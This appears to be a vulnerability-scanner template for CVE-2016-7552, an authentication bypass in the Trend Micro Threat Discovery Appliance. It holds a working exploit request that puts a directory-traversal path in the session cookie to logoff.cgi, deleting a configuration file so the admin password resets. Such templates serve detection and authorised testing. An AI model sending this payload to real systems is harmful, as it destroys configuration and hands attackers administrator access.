28 lines
761 B
YAML
28 lines
761 B
YAML
id: CVE-2016-7552
|
|
|
|
info:
|
|
name: Trend Micro Threat Discovery Appliance Auth Bypass via Directory Traversal
|
|
author: dwisiswant0
|
|
severity: critical
|
|
reference: https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4
|
|
tags: cve,cve2016
|
|
|
|
# This template exploits an authentication bypass vulnerability via a file delete in logoff.cgi
|
|
# which resets the admin password back to 'admin' upon a reboot.
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/logoff.cgi"
|
|
headers:
|
|
Cookie: "session_id=../../../opt/TrendMicro/MinorityReport/etc/igsa.conf"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "Memory map"
|
|
part: body
|